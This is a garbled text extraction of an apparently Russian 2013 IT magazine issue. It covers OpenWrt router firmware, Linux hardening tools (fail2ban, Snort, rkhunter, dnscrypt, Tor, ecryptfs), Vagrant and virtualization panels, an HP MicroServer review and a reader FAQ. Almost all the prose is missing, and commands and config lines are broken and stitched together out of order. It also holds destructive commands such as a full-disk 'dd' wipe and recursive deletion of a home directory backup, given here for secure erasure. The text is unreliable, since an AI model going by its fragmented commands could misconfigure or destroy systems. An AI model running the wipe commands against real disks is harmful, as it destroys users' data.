"Hello, world?"; }
virtual void Method2() { std::cout<<
"Hello, world?"; }
};
CA* pA = NULL;
pA->Method1();
pA->Method2();


. 1 3, 2
5, 20. 255 .
. 1
2 ,
,
.
.
(ERD)
.

4. A, C, D
5. A, B, D

PL/SQL

public static void main(String[]args){


EntityManagerFactoryemf=Persistence.
createEntityManagerFactory("myPU");
EntityManagerem=emf.
createEntityManager();
MyEntity e =newMyEntity();// 1
em.getTransaction().begin();
em.persist(e);// 2
em.getTransaction().commit();// 3
em.close();
em=emf.createEntityManager();// 4
e =em.find(MyEntity.class,
e.getId());// 5
em.close();em=emf.
createEntityManager();// 6
e =em.merge(e);// 7
em.getTransaction().begin();
em.remove(e);// 8
Long amount =(Long)em.createQuery
("select count(e.id) from MyEntity
e").getSingleResult();// 9
em.getTransaction().commit();// 10
em.close();// 11
}

B
.
, , ,
dbms_output.
, .

C#

(garbagecollector) CLR:
A. , .
B. , , .
C. .
D. ,
, .
:
1. B, C
2. A, D
3. B, D

Java
:
e (new,
managed, detached, removed);

( ),
.

CWnd, CWnd::GetDlgI
tem(intnIDControl)?

IT- CUSTIS
(CUSTIS.RU)

, !

, ,
. , . !

, , , ( 1, 2,
). 1 , 2 , 2.

Unixoid

120

09 /176/ 2013


.
- , -
DLNA/VoIP/-, -
.
,
, .

SOHO- ,
, .
,
- ,
.
. , (,
, Huawei, )
Linux,
, , , ?
,
.


rommanio@yandex.ru


:
OpenWrt (https://openwrt.org) ,
. ,
, ( , jffs2 overlayfs
squashfs), opkg
, 3000 ,
/. . ,
.
DD-WRT (www.dd-wrt.com)
. , ,
, ,
, .
(oleg.wl500g.info). Asus. , ,

- .
Tomato (polarcloud.com/tomato) Broadcom.
.

09 /176/ 2013

121

LibreWRT (librewrt.org) FSF. , OpenWrt


,
, .
, - FSF :

, , .
, ,
, . TP-LINK TL-WDR4300 OpenWrt,
.


OPENWRT
.
, .
TP-LINK openwrt-ar71xx-generic-tlwdr4300-v1-squashfs-factory.bin.
(ar71xx), (generic), ,
(factory) OpenWrt (sysupgrade).
sysupgrade .
, ,
.
. Telnet ( 192.168.1.1)
WAN. ,
. , ( , , ),
MAC-,
MAC- ClientID.
( , , ,
openwrt#):

openwrt# uci set network.wan.proto=dhcp


openwrt# uci set network.wan.broadcast=1
openwrt# uci set network.wan.macaddr=
09:aa:bb:cc:dd:ee
openwrt# uci set network.wan.clientid=
0109aabbccddee
openwrt# uci commit network
openwrt# /etc/init.d/network restart

- OpenWrt

TP-LINK
TL-WDR4300 firmware

WARNING
!


.

UCI (United Configuration Interface) ( ) . UCI /etc/config.


, ,
OpenWrt
UCI , , Samba. , ,
, , ( vi)
uci.
.
, -, :
( IP, PPP, PPPoE, L2TP
), broadcast dhcp,
MAC- .
ClientID dhcp (option 61) MAC-.
.
( ) -, . OpenWrt . LuCI -
-:

openwrt# opkg update


openwrt# opkg install luci

/etc/config/fstab extroot

122

Unixoid

09 /176/ 2013

openwrt# /etc/init.d/uhttpd enable


openwrt# /etc/init.d/uhttpd start

option
option
option
option

root.

openwrt# passwd
, Telnet, SSH. -
.
-, .
,
.

EXTROOT
Extroot , , ,
, .
extroot . ,
, .
. OpenWrt, . , , .
:

openwrt# opkg update


openwrt# opkg install block-mount kmod-usb-storage
kmod-scsi-generic kmod-fs-ext4 e2fsprogs
mount .
( ext3 Linux,
OpenWrt) :

openwrt# mkdir /mnt/flash_overlay


openwrt# mount /dev/sda1 /mnt/flash_overlay
openwrt# tar -C /overlay -cvf - . | tar -C
/mnt/flash_overlay -xf -

WWW
OpenWrt:
wiki.openwrt.org/
doc/start

fstype ext3
options rw,sync
enabled 1
enabled_fsck 0

.
,
mount
,
etc/config/fstab option
enabled 0.

SAMBA
, .
. ,
Samba.

openwrt# opkg update


openwrt# opkg install samba36-client
samba36-server luci-app-samba
openwrt# rm /tmp/luci-indexcache

Samba, - .
, , . -,
Edit template security = user
( ) security = share, - , - nobody , , :

openwrt# /etc/init.d/samba enable


openwrt# /etc/init.d/samba start
-.
transmission - , -. :

openwrt# opkg update


openwrt# opkg install transmission-daemon
transmission-web

/etc/
config/fstab,
extroot:


/etc/config/transmission:

<...>
config mount
option target /overlay
option device /dev/sda1

config transmission
<...>
#
option enabled '1'

09 /176/ 2013

#
option config_dir '/etc/transmission'
# , .
# Samba
# nobody,
option user 'nobody'
#
option download_dir '/home/storage/torrents/
done'
#
option incomplete_dir '/home/storage/torrents/
incompl'
<...>
.

openwrt# /etc/init.d/transmission enable


openwrt# /etc/init.d/transmission start

123

,
- (, , ) -, ,
. , .
SquashFS . ,
-.
JFFS2, SquashFS, /. , . .
OpenWrt mtd- . SquashFS /rom, JFFS2
/overlay. overlayfs
SquashFS JFFS3, /, .

-,
9091, - .

DLNA -
, . , DLNA- . , , , Blu-ray-,
. OpenWrt minidlna DLNA-,
:

openwrt# opkg update


openwrt# opkg install minidlna
UCI /etc/config/minidlna. :

# -
config minidlna config
<...>
option enabled '1'
#
option interface 'br-lan'
# minidlna
option db_dir '/home/storage/minidlna/db'
option log_dir '/home/storage/minidlna/log'
#
list media_dir 'A,/home/storage/audio'
list media_dir 'V,/home/storage/video'
list media_dir 'P,/home/storage/photo'
<...>

DD-WRT
DD-WRT - OpenWrt .
.
, , ,
.
Status Sys-Info, , .
, .
:
Samba ProFTPD;
OpenVPN PPTP;
nstx IP over DNS, , - ,
;
HotSpot- , ;
SIP-.
optware ( ), . , JFFS2,
, .
DD-WRT ,
, , . -,
90 . ,

, .

, minidlna ,
.

openwrt# /etc/init.d/minidlna enable


openwrt# /etc/init.d/minidlna start
.
, .
, minidlna inotify, . , , :

openwrt# minidlna -R -f /tmp/minidlna.conf

OPENWRT
- OpenWrt, , OpenWrt Buildroot.
:

$ sudo apt-get install subversion build-essential


git-core libncurses5-dev zlib1g-dev gawk

- DD-WRT

Unixoid

124

09 /176/ 2013

OpenWrt
(feeds). .

$
$
$
$

mkdir openwrt && cd $_


svn co svn://svn.openwrt.org/openwrt/trunk/
cd trunk
./scripts/feeds update -a &&
./scripts/feeds install -a

, .

$ make prereq
, .

$ make menuconfig
, , ,
. menuconfig
, , M
ipk,
. , , , -
, .

:
. , .
.
, .
. LuCI.
.
Global build settings / IPv6. Advanced
configuration options , , , , GCC,

.
. ,
. USB Support
kmod-usb-storage.
.
-
,

$ make kernel_menuconfig
, ,
.

$ svn revert -R target/linux/


factory-, sysupgrade-.
:

$ scp bin/ar71xx/openwrt-ar71xx-generic-tl-wdr4300
-v1-squashfs-factory.bin root@192.168.1.1:/tmp
openwrt# mtd -r write /tmp/openwrt-ar71xx-generictl-wdr4300-v1-squashfs-factory.bin firmware
(write)
, firmware, (-r). OpenWrt
,
- .



.
.

.
OpenWrt. -
( ) -
, Telnet .
,
, Telnet
.
-
.
,
. ,
, , , .
OpenWrt. ipk . ,
( DNS-), .
DD-WRT Wi-Fi , ,
SSH .

$ make
. ,
bin/ .
, . -,
.
scp mtd
. OpenWrt,

. scp mtd

-, .

,
- .

. , DD-WRT, Tomato, ,
NAS, VPN, -
(OpenWrt/LibreWRT) ,
.
, ,
,
. .

166 !
: ?
-, . 300 .
-, .
, . -, (,
): , .

http://shop.glc.ru

6 1110 .
12 1999 .

126

Unixoid

09 /176/ 2013

John Doe

Linux-
,
.
?
?
. , Linux 30 .

.
-,
.
-.
, ,
SSH-. ,
,
.
, ,

. SSH- (!) (!!),
,
-, ,
,

.
Gmail, ,
, .
, , , ,
. , ,
, . , -
,
, ,
. ,
Google , - .
, Linux . ,
. , ,

,
.

!
. : Linux-, -, FTP- SSH-
.
812 .

,
:

$ openssl rand -base64 6


, -, OpenSSL
. , - ,
pwgen (,
):

$ pwgen -Bs 8 1
?
, .
? , , Google
Mozilla . , .
. - -

09 /176/ 2013

KeePassX

Ecryptfs

KeePassX. ,
-, ,
- Android (KeePassDroid).
.

, . ,
/etc/fstab.
~/.Private ~/Private,

.
PAM- pam_ecryptfs.
so, . ~/Private ,
~/.Private .

.
, ,
~/Dropbox. :

... .
HTTPS-
, . :
, : . : Dropbox
, : .
.
.
Linux ,
.
dmcrypt/LUKS, ecryptfs encfs. ,
, , ,
Dropbox.
, TrueCrypt .
,
, ,
. ,

. , ,

( , ).
, ecrypts:

, 2,5
, vasya,
. vasya :

$ mount | grep Private


/home/vasya/.Private on /home/vasya
type ecryptfs ...
,
:

$ sudo rm -r /home/vasya.*

$ sudo ecryptfs-setup-swap
$ ecryptfs-setup-private
, , .

$ sudo apt-get install secure-delete


$ srm -.txt home-video.mpg

, :

, . ,
, dd:

# dd if=/dev/zero of=/dev/sdb
sdb.
( ) . fdisk mkfs.vfat,
gparted.


,
.
iptables pf, -

# ecryptfs-migrate-home -u vasya

K, ,
, ? , - .
,
,
. ,
? srm, ,
:

$ sudo apt-get install ecryptfs-utils

127

BRUTEFORCE-

Fail2ban (www.fail2ban.org) ,
.
, IP-
iptables
TCP Wrappers.
email
. Fail2ban
SSH,
Apache, lighttpd, Postfix, exim, Cyrus
IMAP, named .
Fail2ban
.
Ubuntu/Debian :

# apt-get install fail2ban


/etc/
fail2ban. fail2ban
:

# /etc/init.d/fail2ban restart

128

Unixoid

OpenBSD, ,
ipkungfu. ? , ,
. :

$ sudo apt-get install ipkungfu


:

$ sudo vi /etc/ipkungfu/ipkungfu.conf
# ,
# ,
# loopback-
LOCAL_NET="127.0.0.1"
#
GATEWAY=0
#
FORBIDDEN_PORTS="135 137 139"
# , 90%
#
BLOCK_PINGS=1
#
# ( )
SUSPECT="DROP"
#
# ( DoS)
KNOWN_BAD="DROP"
# ? !
PORT_SCAN="DROP"
ipkungfu /etc/
default/ipkungfu IPKFSTART = 0
IPKFSTART = 1. :

$ sudo ipkungfu
/etc/sysctl.conf:

$ sudo vi /etc/systcl.conf
# ICMP- (
# MITM)
net.ipv4.conf.all.accept_redirects=0
net.ipv6.conf.all.accept_redirects=0
# TCP syncookies
net.ipv4.tcp_syncookies=1
# ( ,
#
# TCP- )
net.ipv4.tcp_timestamps=0
net.ipv4.conf.all.rp_filter=1
net.ipv4.tcp_max_syn_backlog=1280
kernel.core_uses_pid=1

Rkhunter

09 /176/ 2013

$ sudo sysctl -p

GRUB :
1. /sbin/grub
, md5crypt
.

MD5-.
2. /boot/grub/grub.
conf password --md5 .


Snort . ,
.
? , Snort :

$ sudo apt-get install snort


$ snort -D
! , Snort
, , , .

. :

[**] [1:2329:6] MS-SQL probe response


overflow attempt [**]
[Classification: Attempted User
Privilege Gain] [Priority: 1]
[Xref => [url]http://www.securityfocus.
com/bid/9407][/url]

$ sudo vi /etc/cron.daily/rkhunter.sh
#!/bin/bash
/usr/bin/rkhunter -c --cronjob 2>&1
| mail -s "RKhunter Scan Results"
vasya@email.com
email-
:

$ sudo chmod +x /etc/cron.daily/


rkhunter.sh

. - MySQL. . .

rkhunter :

$ sudo rkhunter --update

- , Snort, root
, . ,
, , . rkhunter:

$ sudo apt-get install rkhunter

, ,
cron-.
:

$
$
$
$

sudo
sudo
sudo
sudo

apt-get install tiger


tiger
apt-get install lynis
lynis -c

$ sudo rkhunter -c --sk


.
- , rkhunter .
: /var/log/
rkhunter.log. rkhunter
cron- :

, , . ,
,
rkhunter. debsums
, . :

$ sudo apt-get install debsums


:

09 /176/ 2013

129


,
. :

$ netstat -na | grep ":\ " | wc -l


TCP-:

$ sudo debsums -ac

Tor ,
HTTP-

$ netstat -na | grep ":\ " | grep SYN_RCVD | wc -l

,
cron.

IP-, :

$ netstat -na | grep ":\ " | sort | uniq -c |


sort -nr | less

,

, -
. - . ,
.

,
Chrome Firefox,
proxy switcher. , ,
.
,

DNS- ,
DNS-,
: goo.gl/
FLJmVj.
/etc/resolv.conf:

nameserver 156.154.70.22
nameserver 156.154.71.22

DHCP-
NetworkManager , ,

:

tcpdump:

INFO

# tcpdump -n -i eth0 -s 0 -w output.txt dst port


and host IP-
:

Tor Android
Orbot.



,

.
ecryptfs

Ubuntu.

# iptables -A INPUT -s IP- -p tcp


--destination-port -j DROP

IP :

# iptables -I INPUT -p tcp --syn --dport -m


iplimit --iplimit-above 10 -j DROP
ICMP ECHO:

# iptables -A INPUT -p icmp -j DROP --icmp-type 8

$ sudo dnscrypt-proxy --daemonize


, dnscrypt Windows, iOS
Android.

.
Tor-: ()

.
Tor :


$ sudo chattr +i /etc/resolv.conf

, root.
,
dnscrypt,
DNS- ,
. :

$ wget http://download.dnscrypt.org/
dnscrypt-proxy/dnscrypt-proxy-1.3.2.
tar.bz2
$ bunzip2 -cd dnscrypt-proxy-*.tar.
bz2 | tar xvf $ cd dnscrypt-proxy-*
$ sudo apt-get install build-essential
$ ./configure && make -j2
$ sudo make install
/etc/resolv.conf loopback:

$ vi /etc/resolv.conf
nameserver 127.0.0.1

? Tor.
Tor, , ,
.
,

,
. , , ,
,
,
.
, ,
. Tor : (
),
( ),

$ sudo apt-get install tor


,
-, Tor. :
127.0.0.1:9050, ,
. , SOCKS,
HTTP-.

. Linux-box,
, ,
,
.
, SSH,

.

Tor
()

130

SYN/ACK

09 /176/ 2013



, , .
, . , ,
, .

Vagrant . (boxes),
, boxes .
boxes Chef Puppet. ,
shell.
Ruby. VM SSH,
.
Vagrant Ruby,
,
VirtualBox Ruby. (downloads.vagrantup.
com) Windows, Linux (deb rpm) OS X.
Ubuntu . VirtualBox Vagrant :

$ sudo dpkg -i virtualbox-4.2.10_amd64.deb


$ sudo dpkg -i vagrant_1.2.2_x86_64.deb

VAGRANT
VirtualBox ,
. VM , ,
, , .
Vagrant (vagrantup.com),
VM (Provisioning) .
Vagrant VirtualBox, . AWS (github.
com/mitchellh/vagrant-aws) Rackspace Cloud (github.com/
mitchellh/vagrant-rackspace), VMware Fusion/Workstation.

VirtualBox 4.2.14 Vagrant, 4.2.12 4.2.15. , :

$ cd ~/.vagrant.d/boxes/BoxName/virtualbox
$ openssl sha1 *.vmdk *.ovf > box.mf
Vagrant Ruby:

$ sudo apt-get install ruby1.8 ruby1.8-dev


rubygems1.8
$ sudo gem install vagrant


grinder@synack.ru


Vagrantfile (docs.vagrantup.com/v2/vagrantfile). ,
:

09 /176/ 2013

$ mkdir project
$ cd project
$ vagrant init
: VM (config.vm.*), SSH
(config.ssh.*), Vagrant (config.vagrant).
,
.

, :
Vagrant ( ),
boxes ( '--vagrantfile'), ~/.vagrant.d . ,
, .
vagrant,
'-h'.
, vagrant
box list . box
, , . , Box Ubuntu 12.04 LTS,
Vagrant.

$ vagrant box add precise64


http://files.vagrantup.com/precise64.box
Vagrantfile:

config.vm.box = "precise64"
:

$ vagrant init precise64


, Chef
Puppet, VM ,
Vagrantfile , , ,
:

Vagrant.configure("2") do |config|
config.vm.provision :shell, :inline =>
"script.sh"
end
, script.sh,
VM.
ovf-,

VirtualBox VBoxManage:

131

$ VBoxManage import /home/user/.vagrant.d/boxes/


precise64/virtualbox/box.ovf
Virtual system 0:
0: Suggested OS type: "Ubuntu_64"
(change with "--vsys 0 --ostype <type>"; use
"list ostypes" to list all possible values)
1: Suggested VM name "precise64"
(change with "--vsys 0 --vmname <name>")
2: Number of CPUs: 2
(change with "--vsys 0 --cpus <n>")
3: Guest memory: 384 MB
(change with "--vsys 0 --memory <MB>")
, , , VM (. change with ...):

config.vm.provider :virtualbox do |vb|


vb.customize ["modifyvm", :id,
"--memory", "1024"]
end

WWW
Vagrant:
vagrantup.com
Vagrant Up and
Running: bit.ly/177wzfR
Karesansui:
karesansui-project.info
ConVirt:
convirture.com
WebVirtMgr:
webvirtmgr.net

SSH:

$ vagrant up
$ vagrant ssh

Proxmox VE:
proxmox.com

VM, halt
destroy ( ,
),
vagrant suspend, vagrant resume.
Chef
, APT Apache2:

config.vm.provision :chef_solo do |chef|


chef.recipe_url = "http://files.vagrantup.com/
getting_started/cookbooks.tar.gz"
chef.add_recipe("vagrant_main")
end
VM ,
. 22
2222, SSH.
Vagrantfile:

Vagrant::Config.run do |config|
config.vm.forward_port 80, 1111
end


Vagrant

- ,
http://127.0.0.1:1111/.
, .

Vagrant VirtualBox

SYN/ACK

132

WebVirtMgr

ConVirt

INFO
Vagrant
Karesansui
MIT.

Vagrant
VeeWee (github.com/
jedi4ever/veewee).

$ vagrant package --vagrantfile Vagrantfile


--output project.box
project.box
,
,
vagrant box add project.box.

09 /176/ 2013

Availability, VLAN, , , .
TurboGears2,
ExtJs FLOT, MySQL,
DHCP- DNS- dnsmasq. Linux.

CONVIRT
Xen/KVM, , ,
. . ConVirt (convirture.com) Xen KVM
, .
: , , , , VM VNC, . Ajax
. , VM
. , .
, .
,
convirt-tool . .
ConVirt
,

,
. .
.
,
, . , .
: ,
, ,
, , Xen
KVM. , VM
.

.
ConVirt Convirture, open core ( ),
,
. open source High

KARESANSUI
Karesansui (karesansui-project.info)
-
KVM Xen. , libvirt, OpenVZ, QEMU, VirtualBox
. , Web 2.0 Ajax, jQuery
,
-. , - . TightVNC Java
Viewer (tightvnc.com).
: , , , , VM, ,
, . .
.
,
.
Karesansui Python,
SQLite. Karesansui, , MySQL
PostgreSQL.
Karesansui Linux. CentOS (
), Karesansui
Debian Ubuntu.
, . . ,
.

. , : Guest, Settings, Job,
Network, Storage, Report Log. .
VM ISO- HTTP/FTP- . : ,
, (hostname),

09 /176/ 2013

(Xen KVM),
(Memory Size Disk Size) ,
, .

133

VM

VirtualBox:

WEBVIRTMGR
,

. .
WebVirtMgr (webvirtmgr.
net) virt-manager,
VM
Java-. KVM: , , ,
VM, .
, ISO, ,
. VNC. .
WebVirtMgr
KVM. RPC
libvirt (TCP/16509) SSH.
Python/Django. Linux.
(github.com/euforia/webvirtmgr) RPM CentOS, RHEL, Fedora Oracle Linux 6.

( ), libvirt WebVirtMgr. .
Dashboard Add Connection , VM.

PROXMOX VE
,
. , , . Proxmox Virtual Environment (proxmox.
com/proxmox-ve), Linux
( Debian 7.0 Wheezy),
OpenVZ KVM ,
VMware vSphere, MS Hyper-V Citrix XenServer.
, (
), . - VM.
OpenVZ,
( , /var/lib/
vz/template).
.
,

#!/bin/bash
vmname="debian01"
VBoxManage createvm --name ${vmname} --ostype "Debian"
--register
VBoxManage modifyvm ${vmname} --memory 512 --acpi on --boot1 dvd
VBoxManage createhd --filename "${vmname}.vdi" --size 10000
--variant Fixed
VBoxManage storagectl ${vmname} --name "IDE Controller"
--add ide --controller PIIX4
VBoxManage storageattach ${vmname} --storagectl "IDE Controller"
--port 0 --device 0 --type hdd --medium "${vmname}.vdi"
VBoxManage storageattach ${vmname} --storagectl "IDE Controller"
--port 0 --device 1 --type dvddrive --medium /iso/debian-7.1.0
-i386-netinst.iso
VBoxManage modifyvm ${vmname} --nic1 bridged --bridgeadapter1
eth0 --cableconnected1 on
VBoxManage modifyvm ${vmname} --vrde on
screen VBoxHeadless --startvm ${vmname}

. ,
.
, ,
VM .
(VM, , )
, (AD, LDAP, Linux PAM, Proxmox VE).
- VM
VNC- SSH-, , , .
, , HA-,
,
iSCSI-,
, multipath .
: CPU x64 (
Intel VT/AMD-V), 1+ . ISO Debian.

VM
WebVirtMgr

- . .

Proxmox VE

134

SYN/ACK

09 /176/ 2013


zobnin@gmail.com

HP PROLIANT N54L G7
MICROSERVER:


, , NAS.
. HP MicroServer
.

135

. , , CD-,
:
.
USB-, RJ-45
Ethernet, VGA-, eSATA, ,
PCIe , .
,
,
, , HP
. , MicroServer ,
, (. ).
Kensington, , , ,
.
,

09 /176/ 2013

MicroServer N54L G7, AMD Turion II Neo N54L 2 , Ethernet-.


, Active Directory - .

-, HP Ultra Micro Tower.
, 250 6 ,
,
, - . , , - .
CD, USB- , . ,

, ,

WWW

HDD- SSD
:
goo.gl/Rsb91y


:
goo.gl/zKoIFB

GEN8
HP MicroServer Gen8. ,
, , G7,
, , MicroServer
,

, SATA 3.0
HP iLO 4.
G1610T Gen8 Intel Celeron G1610T (2,3 ),
Intel C204, RAID-
HP Dynamic Smart Array B120I
. G2020T
Intel Pentium G2020T (2,5 )
.
16 , c 12 .
PCIe
PCIe x16, eSATA ,
USB 3.0.
, HP iLO 4,
ProLiant.
Gen8 2022 , G7.

HP MICROSERVER
ixbt.com: HP ProLiant MicroServer:
(bit.ly/16wMabQ)
overclockers.com.au: HP ProLiant MicroServer Owners Club! (bit.ly/ijIXUU)
avforums.com: HP ProLiant MicroServer N40L
Owners Thread (bit.ly/14vP8jb)

Windows Home Server 2011


Ubuntu 12.10
Solaris 11.1
FreeNAS 8.3.1
ESXi 5.1.0 Update 1 (HP Custom Image)

136

SYN/ACK

, CD-. , , ,
3,5-
, 250 ;
,
RAID.
, , , SATA- CD-
, SATA-
- . ,
SSD-, 5,25-
, SATA-,
Molex SATA, BIOS (www.
multiupload.com/BTBRCJUNTO)
.
,
. , , ,
. ,
- ,
,
. CD-
, , .
, ,
, , , , ,
, . ,
USB- A,
ready-to-go
FreeNAS.


HP MicroServer .
-, FTP-, NAS, -

09 /176/ 2013

WARNING

DDR3 ECC
.
ACPI S3
(sleep), ,
,
HP,

.
PCI Express x16


25 .

, .
MicroServer Active Directory , , , .
, RAID-
. , RAID- (

09 /176/ 2013

137


: AMD Turion II Neo N54L (2,20 , 15 , 2 M)
: AMD RS785E/SB820M
: 2 DDR3
: DDR3 PC3-10600E-9 (non-ECC Unbuffered ECC) 1 Samsung PC3-10600E-9 Unbuffered ECC 2
, 8 ( 16 )
Serial ATA: 5 SATA + 1 eSATA ( mini-SAS 1 SFF-8087 1 SATA)
: 3,5" SATA-
: 8 (4 2 ) ( 3 )
: , 1 250
RAID: SATA- RAID 0, 1, 10, JBOD
: HP NC107i ( Broadcom BCM5723KMLG)
Jumbo frames:
: 150
: 1 PCIe x16 v2.0, 1 PCIe x4 ( IPMI), 1 PCIe x1
-: 1 VGA-, 7 USB 2.0 (4 , 2 , 1 ), 1 RJ-45
: Radeon HD4200, : 1920 1200
: Ultra Micro Tower, 26,7 21,0 26,0
: 1
: ACPI V2.0, PCI 2.3, PXE, WOL, IPMI 2.0, USB 2.0, USB 3.0, SATA Gen 2
: Microsoft Windows Server, Red Hat Enterprise Linux (RHEL)


HP MicroServer
.
.

Intel EXPI9301CTBLK Network Adapter 10/100/1000
/ PCI-Express
HP NC360T Dual Port 10/100/1000 / PCI-Express
RAID-
HP P410 Smart Array Controller
HighPoint RocketRAID 2720SGL

Kingston KVR1333D3E9S/4G
HP 500672-B21 4

Western Digital 2 T WD Red (WD20EFRX) {SATA III,
5400 / 64 , 3,5"}
SSD ( , L2ARC ZIL/SLOG
ZFS)
Intel SSD 60 520 (SSDSC2CW060A3K5)
{SATA III, MLC, 2,5"}

HP 615095-B21 Micro Server Remote Access Card Kit
USB 3.0
PCI Express to SuperSpeed USB 3.0 2-Port Expansion
Card for Desktops ( Renesas uPD720202 xHCI
1.0)
HDMI- (
N54L )
ATI Radeon HD 5450 512 DDR3 Sapphire (11166-0610R, PCI-E, DVI, HDMI, VGA)

Seasonic SS-250SU

ZFS

Fake RAID) (, RAID 5 ) , , ,



RAID.
Linux Btrfs,
NAS RAID 5 (
3-way mirror ),
, .
MicroServer
,
,
.
.

, . , VGA,
, -, .
HDMI-
. ,
, PCIe x16, 25 ( : n40l.wikia.com/
wiki/Graphics_Cards.


Scythe Slip Stream 120 PWM Adjustable

INFO

:
E/F,
G,
.

MicroServer ESXi Xen.


,
.
- .

MicroServer.

HP MicroServer N54L G7
. 8500
. ,

, ,
, ,
PCIe-, MicroServer , ,
.

140

09 /176/ 2013

FAQ


gotsijroman@gmail.com


FAQ@REAL.XAKEP.RU


Ubuntu. Network Manager, Android, . ?
, Network Manager
ad hoc (bit.ly/adhoc-wiki),
Android ( iOS,
, ). hotspot.
XDA (bit.ly/hotspotubuntu) ,
, Network Manager.
, hotspot , ap-hotspot. :

$ sudo add-apt-repository
ppa:nilarimogard/webupd8
$ sudo apt-get update
$ sudo apt-get install ap-hotspot

Mhash/s //
Bitcoin- wiki (bit.ly/bitcoinhard). ,

.
. ?
, , SQL-, , XSRF , ][ .
:
SSL , : HTTP HTTPS. SSL
,
.

Q
A

Qualys SSL server test (www.ssllabs.


com/ssltest) SSL ( )
. HSTS (HTTP Strict Transport Security)
,
HTTPS. : dev.
chromium.org/sts.
XSS,
, Content security policy
(bit.ly/CSPIntro) ,
.
XSS-
.
WAF, , ModSecurity.


SSL Qualys

$ sudo ap-hotspot start


start, stop,
restart configure. ,
hotspot,
.
, ,
bitcoin?

bitcoin-,
bitclockers.com/calc.

Q
A

DUPLICITY OS X LINUX

.

. , ,
NSA, , duplicity

. ? , ,
GnuPG, ,
, , ,

.


OS X
Homebrew MacPorts. MacPorts
, duplicity


Duplicity GnuPG . , ,
,
GnuPG-:

$ sudo port install duplicity

$ gpg --gen-key

Ubuntu apt-get.
Google Drive,
gdata-python-client.
(bit.ly/GData-dwn),

$ ./setup.py install

$ gpg --export-secret-key -a > mykey.key


.
,
.

09 /176/ 2013

FAQ

/ .
, . (bit.ly/forgPassImpl)
(bit.ly/remMeImpl).

141

TRIM
SSD WINDOWS?


, ?
- (ctrlq.org/save),
. , , URL
,
. , , API filepicker.io (www.inkfilepicker.com).

Q
A

fsutil:

fsutil behavior query DisableDeleteNotify

0, , TRIM .
, TRIM , TRIM SSD. , , , 100% ,
TRIM ( , ),
TRIMCheck (bit.ly/TrimCheck). : ,
, .
. , (
, JSON- ). , , TRIM. ,
, TRIM: SSD
. ; , .
, , , TRIM SSD
. , - SSD. SATA MS.
, SSD.

Nexus 7 3G. SMS, ,


, . SMS-. ?
(,
XDA: bit.ly/N73GnativeSMS)
mms.apk /system/app
( root),
rw-r--r--. Root Browser (bit.ly/RootBrowser) , . SMS- .


SSH- . , , . ,
, .
?
, SSH- ,
: , Wi-Fi- . SSH
.
Mosh (mosh.mit.edu).
Mosh
SSH Telnet. SSP (State Synchronization Protocol),


Google Drive.
, ,
.
, :

$ export PASSPHRASE="passphrasehere"
$ duplicity /home/user/ "gdocs://
username:xxxx xxxx xxxx
xxxx@gmail.com/backup"
passphrasehere
GnuPG-,
Google. Backup GDrive.

TRIMCheck

Duplicity ,

( librsync).
(--full-if-older-than), (--remove-older-than). ,
cron bash-:

$ export PASSPHRASE="passphrasehere"
$ duplicity --full-if-older-than 1M
/home/user/ "gdocs:..."
$ duplicity remove-older-than 6M
--force /home/user/ "..."
unset PASSPHRASE
exit 0


,
,

.

duplicity "gdocs://username:xxxx xxxx


xxxx xxxx@gmail.com/backup" /home/user
Google Drive, duplicity

. man
(duplicity.nongnu.org).

FAQ

142

09 /176/ 2013


/DEBUG
Windows

. : bcdedit -debug on, .


.
?
, , .
.
<F10>
Windows. , , /DEBUG ( )
<Enter>.
,
, , ,
:

bcdedit -debug off



.
Mosh ,
UDP. Mosh , WiFi
3G-, ,
. Linux, OS X,
Android. .
VBS ?
, ?
VBS ,
, .
. , AutoItX3 AutoIt,
ActiveX/COM-.
script-coding.com/AutiItX.html, DLL
300 : bit.ly/AutoItX3.
,
. DLL- system32

Q
A

regsvr32 AutoItX3.dll
, , :


DNS-.

DNS-, , , ,
- DNS Google . ?
DNS-

Google
(

OpenDNS) The
Global Internet Speedup (afasterinternet.com).
. ,
, , ,
. , ,
. , ,
Namebench ( Windows, Linux OS X).
DNS,
DNS-
.

64- Windows 7

,
. , -

Set oAutoIt = WScript.


CreateObject("AutoItX3.Control")
'

oAutoIt.MouseMove 0,0 '


oAutoIt.MouseMove 150, 150, 0

VS

, , ?

,
.

,

, , CVV/CVC2-
Visa.

SVN-.

Git?
.
, .
, git-svn. Git SVN.
Git
,
SVN-, . , git-svn ,
Git.
: bit.ly/git-svn-tut.
Windows, git-svn
msysGit (msysgit.github.io).
, git-svn Cygwin.

Q
A

cron , 5 ?
cron ,
cron, .
shell-,
sleep:

Q
A

while true
do
/home/xakep/myprogram
sleep 5
done

, , nohup:

$ nohup ./every5seconds.sh &


. ?
. in-memory
, , . ,
, .
LMDB (symas.com/
mdb) FastDB (garret.ru/fastdb.html). Redis
(redis.io) . Redis
, .

Q
A



. ,
.

,

.

>Multimedia
Artweaver 4.0
Bytescout Watermarking
BZR Player 0.95
Caesium 1.6.1
Colour Surprise 1.0
Epic Pen
Format Factory 3.1.1
FotoMix 9.2
FotoMorph 13.8
MoviePile

>Misc
8Stack
Backup Thunderbird
Bgcall 2.6.2
Bill2?s Process Manager 3.4.3.6
BlueScreenView 1.52
Classic Shell 3.6.8
Folder Actions for Windows 1.1
Marble 1.5.0
MouseController 1.6
NCS WinVisible 1.0.6.6
Nucleus 0.2.0
Quick Any2Ico 1.1
RegDllView 1.50
SchizoCopy
ServiWin 1.56
XSearch 0.23

>Development
Alaborn iStyle 5.4.4.1
AntiSQLi
Bandit 1.1.1
Boost 1.54.0
Boost Dependency Analyzer 1.1
CodeLite 5.2
DBeaver 2.2.4
GitHub 1.0
MySQL 5.6.13
MySQL Workbench 6.0.6
PHP 5.5.1
PyScripter 2.5.3
RadASM 2.2.1.6
SmartGitHg 4.6.2
SourceTree 1.0.8
Visual Assist X
Ynote Classic 2.5

>>WINDOWS
>DailySoft
7-Zip 9.20
DAEMON Tools Lite 4.47.1
Far Manager 3.0
Firefox 23
foobar2000 1.2.9
Google Chrome 28
K-Lite Mega Codec Pack 9.9.6
Miranda IM 0.10.16
Notepad++ 6.4.5
Opera 15.0
PuTTY 0.62
Skype 6.3
Sysinternals Suite
Total Commander 8.01
Unlocker 1.9.2
uTorrent 3.3.1
XnView 2.04

>>MAC
Abyss Web Server 2.9
Blender 2.68
BootChamp 1.5.1
Dapplegrey 3.6
Eclipse IDE 4.3
GitHub 1.50

>System
AllOff 5.2
DriverIdentifier 4.2.5
dUninstaller 1.3
Install Monitor 1.1
ISOBuddy 1.1.1.3
Partition Wizard 8
PrivaZer 2.0.1
Process Hacker 2.31
Quick Cliq 2.0.8
SaBackup 0.9.6.1
